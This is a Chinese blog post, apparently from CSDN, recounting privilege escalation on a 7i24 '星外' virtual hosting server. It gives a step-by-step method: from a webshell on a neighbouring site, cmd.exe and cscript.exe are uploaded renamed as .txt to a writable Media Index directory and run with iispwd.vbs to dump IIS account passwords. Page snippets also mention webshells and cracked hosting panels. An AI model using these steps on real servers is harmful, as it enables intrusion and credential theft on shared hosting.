星外虚拟主机与php,星外虚拟主机提权拿服务器

最新推荐文章于 2022-01-23 16:28:34 发布
最新推荐文章于 2022-01-23 16:28:34 发布
阅读量134 收藏
点赞数
文章标签: 星外虚拟主机与php

本次是对自己的IDC服务器的一次友情检测。

本来服务器就已经拿了N次了。漏洞一直都放在那里。

结果总有人拿到权限就炫耀。至于吗、?我本来就打算去换空间去了。 (还有仇家格我站,技术差我还不说什么。还到我面前吹,我承认自己服务器安全做的不好,你炫耀个撒。写出文章。给大家分享下。解决正在学习中。遇到困惑的人。BS。 谢谢朋友们提醒我.其实我都知道。谢谢你们的友情提醒)

开始正题。拿到旁站权限。shell一个。支持ASPX 。主要读IIS 。

JanKer用自己网站做测试。 www.xxhackxx.com

星外虚拟主机,找到可以执行的目录

C:/Documents and Settings/All Users/Application Data/Microsoft/Media Index

上传CMD.EXE cscript.EXE IISPWD.VBS

把EXE 改成TXT 上传

C:/Documents and Settings/All Users/Application Data/Microsoft/Media Index/cmd.txt

C:/Documents and Settings/All Users/Application Data/Microsoft/Media Index/cscript.txt

上传完毕

0818b9ca8b590ca3270a3433284dd417.png

0818b9ca8b590ca3270a3433284dd417.png

然后继续

CmdPath : C:/Documents and Settings/All Users/Application Data/Microsoft/Media Index/cmd.txt

Argument : /c “C:/Documents and Settings/All Users/Application Data/Microsoft/Media Index/cscript.txt” e:/freehost/xxhackxx/web/iispwd.vbs

0818b9ca8b590ca3270a3433284dd417.png

7i24虚拟主机管理平台受控端 freehostrunat 密码是爆出来的密码。我就不写出来了。密码会像7b41043919eec81c59f9eb95ac3bc456!7

不要以为这是什么加密。我也想了半天。什么都不像。结果是明文

法号清水
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
星外主机大全
07-30
星外主机大全
星外虚拟主机平台国内五大域名接口设置方法
09-30
星外虚拟主机平台作为一个高效且集成化的服务,供了与国内五大知名域名注册商——新网、新网互联、商务中国、中国频道和万网的接口集成。这种集成允许用户在星外平台上无缝地进行域名查询和注册,无需跳转到各个...
星外虚拟主机服务器
收集盒 Book box
06-18 2320
 星外虚拟主机服务器 2011-04-24 12:37星外虚拟主机服务器 本次是对自己的IDC服务器的一次友情检测。本来服务器就已经拿了N次了。漏洞一直都放在那里。结果总有人拿到限就炫耀。至于吗、?我本来就打算去换空间去了。 (还有仇家格我站,技术差我还不说什么。还到我面前吹,我承认自己服务器安全做的不好,你炫耀个撒。写出文章。给大家
php星外,一次星外虚拟主机
weixin_42509815的博客
03-13 358
今天看到个大马多功能防asp木马查杀内部测试版(有后门)看了下.换客网www.taoyuanbao.com小小检测了下绝对没啥可利用的。直接旁注几分钟拿下了个shell貌似运气好,随便打开个旁站。手工输入 fckeditor路径 …。存在…FCKeditor/editor/filemanager/connectors/test.htmlFCKeditor/editor/filemanager/co...
星外主机利用
weixin_33825683的博客
08-05 109
T00LS上最近段时间谈了比较多星外的方法,最近刚好碰到了站结合些大牛的思路写个过程!目标是钓鱼站很是讨厌,没0DAY 程序也很安全,旁注拿到了SHELL.测试支持ASPX脚本!上传了个BIN免杀ASPX大马 其他结果大家也知道了,目标跨不过去,MYSQL等目录跳不过去,CMD和其它工具上传执行显示空白或者示无限!RegShell读注册表没发现多少利用的东西,但是...
星外虚拟主机目录
05-04
星外虚拟主机目录
星外虚拟主机新思路
07-25
星外虚拟主机新思路,fuck,说明还有字数限制?
星外虚拟主机管理平台 3.5重要更新说明
10-01
星外虚拟主机管理平台 3.5重要更新说明
星外虚拟主机管理系统
04-30
广州市星外信息科技有限公司(7i24.Com)是一个专业从事网络软件工程研究和推广的公司,其主要人员来自Microsoft China、GDIA等国内外知名企业和组织。7i24.Com是国内具 有影响力的互联网技术网站之一,网站成立于...
星外-华众-新网-虚拟主机专用Webshell
08-23
支持星外、华众、N点、新网等虚拟主机,功能强大。
星外虚拟主机管理平台
03-21
星外虚拟主机管理平台星外虚拟主机管理系统最新破解版+主控端+被控端+授文件
星外虚拟主机管理系统破解版+主控被控 完美
05-15
星外虚拟 主机 管理系统 破解版 +主控 被控 完美运行,去除了验证文件,可直接使用
最新星外虚拟教程.rar
10-21
最新星外虚拟教程 没用过 大家自己试吧。。。。
星外全套工具.zip
06-26
星外全套工具,内含(ee.exe,isspwd.vbs)读取iss账号及密码。isspwd.vbs为读取iss脚本。ee.exe有两个参数,-i和-u。
常见虚拟主机目录对照表/星外目录
harryxlb的专栏
03-30 4056
常见虚拟主机目录对照表、星外目录 D:\virtualhost\web580651\www\          新网虚拟主机 F:\usr\fw04408\xpinfo\                  万网虚拟主机 D:\hosting\wwwroot\                    Prim@Hosting虚拟主机 e:\wwwroot\longzhihu\wwwro
php星外大马,谈对星外主机利用
weixin_39692830的博客
04-06 141
首发:www.bhst.org作者:杀虫剂 qq:395697379blog:hi.baidu.com/scjhackT00LS 上最近段时间谈了比较多星外的方法,最近刚好碰到了站结合些大牛的思路写个过程!目标是钓鱼站很是讨厌,没0DAY 程序也很安全,旁注拿到了SHELL.测试支持ASPX脚本!上传了个BIN免杀ASPX大马 其他结果大家也知道了,目标跨不过去,MYSQL等目录跳不过去,...
weixin_46273733的博客
01-23 1480
攻击者对服务器一般分为两种: 一种是溢出,另一种是第三方组件。 溢出 溢出是指攻击者利用系统本身或系统中软件的漏洞来获取 root限,其中溢出又分为远程溢出与本地溢出。 远程溢出是指攻击者只需要与服务器建立连接,然后根据系统的漏洞,使用相应的溢出程序,即可获取到远程服务器的 root限。 本地溢出,攻击者首先需要有服务器一个用户,且需要有执行限的用户才可能发起。攻击者通常会向服务器上传本地溢出程序,在服务器端执行。如果系统存在漏洞,那么将
拒绝星外虚拟主机管理系统超级用户freehostrunat远程桌面高安全
09-30
为了高安全,我们需要将一些具有超级用户限的用户,禁止远程登录,这样高安装,因为这些用户的密码都是固定或密码比较简单
php mysql 星外_星外虚拟主机跨web目录文件读取漏洞
weixin_39919195的博客
02-28 100
星外虚拟主机跨目录读取文件漏洞,需要一定条件。问题发生在以下文件,这些文件都没有严格的设置执行限,当前的IIS用户能够顺利的利用它们执行命令:c:\windows\7i24IISLOG.exec:\windows\7i24IISLOG2.exec:\windows\7i24IISLOG3.exec:\windows\7i24IISLOG4.exec:\windows\7i24tool.exec:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值